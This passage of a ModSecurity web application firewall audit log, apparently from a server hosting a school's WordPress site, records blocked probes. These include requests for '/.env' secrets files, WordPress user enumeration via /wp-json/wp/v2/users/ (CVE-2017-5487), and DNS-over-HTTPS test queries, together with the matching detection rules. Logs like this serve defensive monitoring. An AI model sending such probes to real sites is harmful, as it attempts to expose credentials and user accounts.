Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --f88a3827-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f88a3827-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749633586817561 898 (- - -) Stopwatch2: 1749633586817561 898; combined=381, p1=348, p2=0, p3=0, p4=0, p5=33, sr=136, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f88a3827-Z-- --c4419e05-A-- [11/Jun/2025:16:39:37 +0700] aElO2QI48YPcPeAOw9tQhgAAAAU 103.236.140.4 60706 103.236.140.4 8181 --c4419e05-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 41.193.181.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 41.193.181.74 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c4419e05-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c4419e05-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749634777472004 3184 (- - -) Stopwatch2: 1749634777472004 3184; combined=1560, p1=528, p2=991, p3=0, p4=0, p5=40, sr=86, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c4419e05-Z-- --91d3d748-A-- [11/Jun/2025:16:48:34 +0700] aElQ8gI48YPcPeAOw9tQkgAAAAM 103.236.140.4 60784 103.236.140.4 8181 --91d3d748-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.59 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.59 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 6.0; CAM-L23) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 Mobile Safari/537.36 Accept-Charset: utf-8 --91d3d748-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --91d3d748-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749635314937140 28437 (- - -) Stopwatch2: 1749635314937140 28437; combined=55096, p1=318, p2=0, p3=0, p4=0, p5=27408, sr=93, sw=0, l=0, gc=27370 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --91d3d748-Z-- --8fc93d25-A-- [11/Jun/2025:17:09:13 +0700] aElVyW7bf2YTFvcEXPuJFwAAAE8 103.236.140.4 34620 103.236.140.4 8181 --8fc93d25-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 147.182.248.135 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 147.182.248.135 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --8fc93d25-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8fc93d25-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749636553158434 866 (- - -) Stopwatch2: 1749636553158434 866; combined=407, p1=369, p2=0, p3=0, p4=0, p5=38, sr=159, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8fc93d25-Z-- --52a0a371-A-- [11/Jun/2025:17:23:58 +0700] aElZPtDFbATf6vJlOUt6ggAAAJI 103.236.140.4 37330 103.236.140.4 8181 --52a0a371-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 116.118.104.42 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 116.118.104.42 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --52a0a371-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --52a0a371-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749637438550140 3370 (- - -) Stopwatch2: 1749637438550140 3370; combined=1356, p1=461, p2=862, p3=0, p4=0, p5=33, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --52a0a371-Z-- --a2bcb879-A-- [11/Jun/2025:17:32:21 +0700] aElbNZP8TulJ-kfHNvEE4wAAAMg 103.236.140.4 40964 103.236.140.4 8181 --a2bcb879-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 113.176.100.242 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 113.176.100.242 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --a2bcb879-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a2bcb879-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749637941707495 3187 (- - -) Stopwatch2: 1749637941707495 3187; combined=1294, p1=439, p2=825, p3=0, p4=0, p5=30, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a2bcb879-Z-- --5c1ede37-A-- [11/Jun/2025:18:04:13 +0700] aElirZP8TulJ-kfHNvEFHQAAANY 103.236.140.4 41266 103.236.140.4 8181 --5c1ede37-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 46.231.78.228 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 46.231.78.228 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --5c1ede37-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5c1ede37-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749639853182227 3155 (- - -) Stopwatch2: 1749639853182227 3155; combined=1396, p1=466, p2=898, p3=0, p4=0, p5=32, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5c1ede37-Z-- --f6f94c47-A-- [11/Jun/2025:18:13:12 +0700] aElkyJP8TulJ-kfHNvEFLAAAANU 103.236.140.4 41340 103.236.140.4 8181 --f6f94c47-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 78.187.58.11 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 78.187.58.11 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --f6f94c47-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f6f94c47-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749640392145332 3046 (- - -) Stopwatch2: 1749640392145332 3046; combined=1354, p1=449, p2=875, p3=0, p4=0, p5=29, sr=81, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f6f94c47-Z-- --21d7973b-A-- [11/Jun/2025:19:30:17 +0700] aEl22ZP8TulJ-kfHNvEFcwAAAMc 103.236.140.4 42240 103.236.140.4 8181 --21d7973b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.84.199 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.84.199 X-Forwarded-Proto: https Connection: close User-Agent: SAMSUNG-S8000/S8000XXIF3 SHP/VPP/R5 Jasmine/1.0 Nextreaming SMM-MMS/1.2.0 profile/MIDP-2.1 configuration/CLDC-1.1 FirePHP/0.3 Accept-Charset: utf-8 --21d7973b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --21d7973b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749645017729369 753 (- - -) Stopwatch2: 1749645017729369 753; combined=302, p1=264, p2=0, p3=0, p4=0, p5=37, sr=71, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --21d7973b-Z-- --5c7f4276-A-- [11/Jun/2025:19:42:39 +0700] aEl5vwI48YPcPeAOw9tTxQAAABE 103.236.140.4 42358 103.236.140.4 8181 --5c7f4276-B-- POST /dns-query HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 8.208.10.94 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 8.208.10.94 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --5c7f4276-C-- çÉexamplecom --5c7f4276-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --5c7f4276-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1749645759238914 3572 (- - -) Stopwatch2: 1749645759238914 3572; combined=2280, p1=544, p2=1650, p3=28, p4=30, p5=28, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5c7f4276-Z-- --bda79436-A-- [11/Jun/2025:19:42:39 +0700] aEl5vwI48YPcPeAOw9tTxwAAABM 103.236.140.4 42364 103.236.140.4 8181 --bda79436-B-- POST /dns-query HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 8.208.10.94 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 8.208.10.94 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --bda79436-C-- ´!examplecom --bda79436-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --bda79436-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1749645759761102 2918 (- - -) Stopwatch2: 1749645759761102 2918; combined=2073, p1=439, p2=1565, p3=21, p4=23, p5=25, sr=95, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bda79436-Z-- --71b51f62-A-- [11/Jun/2025:19:42:41 +0700] aEl5wQI48YPcPeAOw9tTygAAABU 103.236.140.4 42370 103.236.140.4 8181 --71b51f62-B-- POST /query HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 8.208.10.94 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 8.208.10.94 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --71b51f62-C-- ™examplecom --71b51f62-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --71b51f62-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1749645761869448 2670 (- - -) Stopwatch2: 1749645761869448 2670; combined=1790, p1=399, p2=1324, p3=21, p4=22, p5=24, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --71b51f62-Z-- --a02d4728-A-- [11/Jun/2025:19:42:42 +0700] aEl5wgI48YPcPeAOw9tTzQAAABY 103.236.140.4 42376 103.236.140.4 8181 --a02d4728-B-- POST /query HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 8.208.10.94 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 8.208.10.94 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --a02d4728-C-- BCexamplecom --a02d4728-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --a02d4728-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1749645762391487 1993 (- - -) Stopwatch2: 1749645762391487 1993; combined=1245, p1=283, p2=920, p3=13, p4=14, p5=15, sr=47, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a02d4728-Z-- --d97bc85a-A-- [11/Jun/2025:19:42:42 +0700] aEl5wgI48YPcPeAOw9tT0AAAAAM 103.236.140.4 42382 103.236.140.4 8181 --d97bc85a-B-- POST /resolve HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 8.208.10.94 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 8.208.10.94 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --d97bc85a-C-- ƒ6examplecom --d97bc85a-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --d97bc85a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1749645762916691 3353 (- - -) Stopwatch2: 1749645762916691 3353; combined=2127, p1=427, p2=1626, p3=22, p4=28, p5=24, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d97bc85a-Z-- --f9304908-A-- [11/Jun/2025:19:42:43 +0700] aEl5w27bf2YTFvcEXPuKZQAAAFc 103.236.140.4 42388 103.236.140.4 8181 --f9304908-B-- POST /resolve HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 8.208.10.94 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 8.208.10.94 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --f9304908-C-- ¥Äexamplecom --f9304908-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --f9304908-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1749645763438302 2848 (- - -) Stopwatch2: 1749645763438302 2848; combined=1867, p1=444, p2=1355, p3=21, p4=22, p5=25, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f9304908-Z-- --ed4c285c-A-- [11/Jun/2025:19:42:44 +0700] aEl5xAI48YPcPeAOw9tT1QAAAAs 103.236.140.4 42394 103.236.140.4 8181 --ed4c285c-B-- POST / HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 8.208.10.94 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 8.208.10.94 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --ed4c285c-C-- ¢\examplecom --ed4c285c-F-- HTTP/1.1 200 OK Last-Modified: Sat, 19 Aug 2023 08:21:22 GMT ETag: "13cd-6034254946480" Accept-Ranges: bytes Content-Length: 5069 Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html --ed4c285c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1749645764160482 3654 (- - -) Stopwatch2: 1749645764160482 3654; combined=2301, p1=463, p2=1747, p3=33, p4=31, p5=27, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ed4c285c-Z-- --54f6f63b-A-- [11/Jun/2025:19:42:45 +0700] aEl5xQI48YPcPeAOw9tT2AAAABE 103.236.140.4 42400 103.236.140.4 8181 --54f6f63b-B-- POST / HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 8.208.10.94 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 8.208.10.94 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --54f6f63b-C-- §rexamplecom --54f6f63b-F-- HTTP/1.1 200 OK Last-Modified: Sat, 19 Aug 2023 08:21:22 GMT ETag: "13cd-6034254946480" Accept-Ranges: bytes Content-Length: 5069 Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html --54f6f63b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1749645765418732 2869 (- - -) Stopwatch2: 1749645765418732 2869; combined=1784, p1=408, p2=1301, p3=27, p4=23, p5=25, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --54f6f63b-Z-- --17f6f50b-A-- [11/Jun/2025:20:25:07 +0700] aEmDswI48YPcPeAOw9tUJgAAAAM 103.236.140.4 42794 103.236.140.4 8181 --17f6f50b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 62.221.192.174 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 62.221.192.174 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --17f6f50b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --17f6f50b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749648307563567 3415 (- - -) Stopwatch2: 1749648307563567 3415; combined=1494, p1=518, p2=945, p3=0, p4=0, p5=31, sr=113, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --17f6f50b-Z-- --c19b653f-A-- [11/Jun/2025:21:21:00 +0700] aEmQzJP8TulJ-kfHNvEGkQAAANA 103.236.140.4 44514 103.236.140.4 8181 --c19b653f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 110.235.255.160 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 110.235.255.160 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c19b653f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; 